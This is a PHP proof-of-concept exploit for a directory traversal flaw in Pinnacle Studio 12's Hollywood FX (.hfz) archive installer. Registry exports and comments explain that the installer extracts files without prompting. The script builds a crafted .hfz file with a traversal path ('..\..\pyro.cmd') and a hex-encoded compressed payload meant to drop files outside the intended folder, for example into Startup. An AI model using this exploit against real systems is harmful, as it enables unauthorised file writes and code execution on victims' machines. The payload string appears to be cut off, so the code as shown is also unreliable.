Pinnacle Studio 12 Directory Traversal

`<?php  
/*  
Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory  
traversal vulnerability poc  
by Nine:Situations:Group::pyrokinesis  
  
Our site: http://retrogod.altervista.org/  
Software site: http://www.pinnaclesys.com/  
  
Some keys exported from the registry:  
  
[HKEY_CLASSES_ROOT\.hfz]  
@="hfzfile"  
  
[HKEY_CLASSES_ROOT\.hfz\hfzfile]  
  
[HKEY_CLASSES_ROOT\.hfz\hfzfile\ShellNew]  
  
[HKEY_CLASSES_ROOT\hfzfile]  
@="Hollywood FX Compressed Archive"  
  
[HKEY_CLASSES_ROOT\hfzfile\DefaultIcon]  
@="C:\\WINDOWS\\Installer\\{D041EB9E-890A-4098-8F94-51DA194AC72A}\\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0"  
  
[HKEY_CLASSES_ROOT\hfzfile\shell]  
  
[HKEY_CLASSES_ROOT\hfzfile\shell\Open]  
  
[HKEY_CLASSES_ROOT\hfzfile\shell\Open\command]  
@="\"C:\\Documents and Settings\\All Users.WINDOWS\\Documenti\\Pinnacle\\Content\\HollywoodFX\\InstallHFZ.exe\" \"%1\""  
"command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,\  
79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,\  
00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,\  
70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,\  
00,22,00,00,00,00,00  
  
Usually files are decompressed in a Pinnacle effects folder...  
Problem is ... that .hfz files can be used to overwrite files on the target system  
or placing scripts in Startup folders by directory traversal attacks  
and InstallHFX.exe decompresses them with no prompts!  
Just modified an existing .hfz file and here it is the dump ...  
Also I experienced some crashes in doing this... investigating...  
  
*/  
  
$____path = "..\\..\\..\\..\\..\\..\\..\\..\\pyro.cmd";  
  
$____payload = "\x48\x46\x58\x5a\x48\x46\x58\x5a\x9c\x07\x00\x00\x49\x00\x00\x00". "\x00\x21\x00\x00\x00\x7e". $____path. "\x65\x07\x00\x00\xa8\x1c\x00\x00\x8d\xc2\x71\x5a". "\x78\x9c\xbd\x59\x7b\x4c\x53\x57\x1c\xbe\x05\xf6\x10\x96\x6c\x0b". "\x33\xab\x2f\x5a\x2d\xe0\xe4\xdd\xd6\x84\xf2\x18\xbd\x2d\x6f\x04". "\x8a\xa5\x50\x44\x50\xcb\x1b\x05\x8a\x3c\xb4\x22\x8e\x25\x26\xcb". "\xd4\x64\xee\x8f\x2d\x9b\xcb\xe6\xd4\x2c\x21\xd3\x65\x6e\x59\xa2". "\x5b\x8c\x01\x97\xa8\x89\xc1\x05\xf7\xd7\xd8\x12\xcd\xc8\x12\x51". "\xf7\x62\xe0\x03\x5f\x77\xdf\xed\x69\x2f\xb7\xb7\xb7\xb7\xe5\xb2". "\xec\xe4\x77\x2e\xe7\x9e\x7b\xce\xef\x7c\xf7\xfb\x3d\xce\xb9\xa5". "\xa8\xa0\x26\xbf\x28\x3f\x4f\x97\x42\x51\x54\x24\xaa\xd9\x54\x99". "\x5c\xd1\xde\xad\x4e\xd3\xe3\x86\x3a\xd4\xd1\x9a\x13\x45\x7a\x93". "\x2a\x4a\x51\xad\x16\xb6\x5b\x41\x29\x5c\x54\x71\x59\xa1\x76\xf0". "\x15\x8a\x0a\x53\x84\x47\xa4\xa1\x33\x16\xd5\xfb\x37\x70\x79\xd3". "\xc8\xaf\x76\x3b\x13\x54\xaa\xab\x9f\x86\x32\xec\x3f\x97\x50\xd6". "\x4d\x4c\x1c\x0a\x2a\x09\x09\x6f\x48\x0f\x08\x65\xa1\xaa\xaa\x27". "\x16\xcb\x7d\xc8\x22\xf1\x00\x4c\x7a\xfa\x90\x46\xb3\x3b\x14\xe4". "\x44\x44\x17\x6a\x69\x61\x76\xee\x64\x6c\xb6\xc7\x10\x09\x3c\x4c". "\x5c\x9c\x3c\x79\x1a\x1b\xcb\xbf\x95\xc6\xd3\xdd\xcd\x6c\xde\xcc". "\x6c\xdc\x38\x07\x7e\x9c\x4e\xc6\x6a\x7d\x88\x76\x40\x3c\xa9\xa9". "\xf7\x56\xae\x0c\x02\x20\x21\xe1\xa1\x5a\x2d\x31\x60\xe2\xcc\x19". "\xbe\xf8\x2f\x04\x0c\xe0\x07\xd7\xca\xca\x47\x5b\xb7\x32\xa5\xa5". "\xb3\x25\x25\xff\x04\xe4\x67\xfd\xfa\x07\x31\x31\x8f\xd7\xac\x09". "\xb4\x1c\xc0\xb0\x78\xd2\xd3\xef\xaf\x5a\x25\x0f\x0f\x64\x60\x80". "\xb5\x17\x50\xa1\x8d\x6b\x4d\x0d\x53\x5b\x1b\x00\x0f\x4d\x33\x26". "\x93\xc0\x04\x44\xe6\x62\x63\x87\x95\x4a\xc8\x1d\x70\xa8\xd5\x4a". "\xf0\x33\x7b\xed\xda\x0f\xa7\x4e\x49\xe0\x81\xdb\x13\x4e\x60\x3e". "\xc2\x18\xb1\x1a\xdf\xc9\xe7\x75\xc6\xc7\xcf\xa9\x54\xb3\xcb\x97". "\x0b\x50\x4d\xb9\xcb\x65\x9b\x6b\x9a\xb0\x97\x98\xc8\xac\x5d\x8b". "\xc6\xa3\xd5\xab\xfd\xf9\xf9\xf1\xf4\x69\x09\x3c\x44\x0a\x0b\xff". "\x22\x60\x7a\x7a\x3c\x44\x01\xe7\x86\x0d\x33\xe4\x29\x56\xf7\x01". "\x60\x36\xb3\x0b\xe9\xf5\x5c\xe7\x6d\x77\x99\xd8\xba\x7f\x9a\xb3". "\xa6\xc1\xc0\x5e\x4d\x26\x51\x7b\x4d\x5d\xbc\x28\x8d\x07\x02\x4b". "\x11\x5a\x9a\x9b\x59\x3c\xad\xad\xec\x6d\x47\x87\x78\x7c\xb1\x48". "\x52\x53\xe1\xc0\x84\x01\x82\xe7\x6a\xcd\xc0\xb4\xc0\xbb\x32\x32". "\xf8\x2f\x12\x8a\xff\x08\xa4\xa8\xe8\x6f\xe0\x81\xc9\xca\xcb\xef". "\x21\x1b\x80\xb1\x80\xf1\x1e\x1f\xef\x01\x96\x99\x49\xf0\x7c\x91". "\xd7\x26\xc4\xc3\x49\x72\x32\xae\x93\x23\x23\x0b\xc5\x43\x04\x90". "\x20\x68\xec\xd8\xc1\x72\x25\x11\xc2\x0f\xd6\xac\x99\xd1\x68\x08". "\x9e\xc3\x7a\x3b\xf0\xf8\x3b\x3c\xd7\xf3\xf3\xd9\xb3\x80\x71\x65". "\x78\x78\xa1\x78\x88\xa5\x90\x04\x48\xdc\x91\xe0\x12\x8d\xe2\xdf". "\xba\x3e\x44\x58\x11\x3c\xfb\xd3\x6c\x1c\x3f\xa2\x61\x48\x60\x5c". "\x3f\x77\x4e\x06\x1e\x22\x34\x3d\x55\x5f\xcf\x20\xa0\xe0\xc3\xac". "\xce\xec\x6c\xc1\x8b\x03\x46\xd2\xd2\xd5\x04\xcf\x50\x8a\x15\x78". "\x66\x96\x2d\x93\x88\x77\x79\xf6\xe2\x0b\xd2\x91\x27\xc9\xa8\x54". "\x82\x64\x48\xf0\x70\x65\xdf\x6b\x65\x7f\xa8\x54\x4f\x34\x1a\x8c". "\x14\xc5\x83\x80\xad\xab\x63\x75\xba\x5c\x9e\xd4\x27\x0f\x12\x5f". "\xe7\xdd\x15\x2b\x18\xa3\x91\x6f\x3b\x0e\xcf\x50\x42\xb9\xc7\x5e". "\x08\xf3\x82\x02\x7f\x3c\x44\x1b\x49\x74\x48\xc2\xc8\x2d\xd8\xd0". "\x17\x89\x87\x64\x39\x6c\x1c\x10\x01\xa4\xb7\x12\xca\x89\xdb\x60". "\x00\x1a\xe4\xea\x8f\x67\xef\x5e\xa6\xa2\xe2\xc1\xf6\xed\x32\xc9". "\x09\x18\xef\x49\x49\xdc\xee\x79\x43\xad\xbe\x2c\xd8\x6d\xe3\xe3". "\x81\x07\xb6\xf3\xc7\x63\x77\x6f\x0a\x70\x4b\xd1\xb5\xf2\xf2\x7e". "\x97\x89\x87\x64\xe0\x94\x14\xa9\x7d\xdf\x68\x84\xcb\x71\xc0\x82". "\x2e\xb4\x6b\x17\x0b\x15\x3b\xbb\x1c\x3c\x71\x71\xac\x17\x91\xb8". "\x93\x90\xac\x2c\xce\xb2\xd2\xab\x20\xbd\x60\x77\x40\x86\x41\x1e". "\x16\x3d\xf9\x70\x27\xcc\x20\x2b\x86\x2c\x12\x60\xb0\x5b\xc1\xc3". "\xe1\xea\x84\x1c\x04\x20\x12\x20\x4e\x65\x12\x53\x2c\x96\x5b\x34". "\x7d\x2e\x3b\xfb\xeb\xf0\xf0\xe7\x15\x0a\xc5\xf8\xf8\x38\x17\x59". "\x4a\xa5\xb2\x25\xc1\x66\x30\x0c\xe7\xe5\x9d\xed\xef\x9f\x95\xed". "\xa8\x90\xe2\xe2\x69\x72\x50\x04\x1b\x88  
  
$_f = fopen("puf.hfz", "w+");  
  
fputs($_f, $____payload);  
  
fclose($_f);  
  
?>  
  
  
`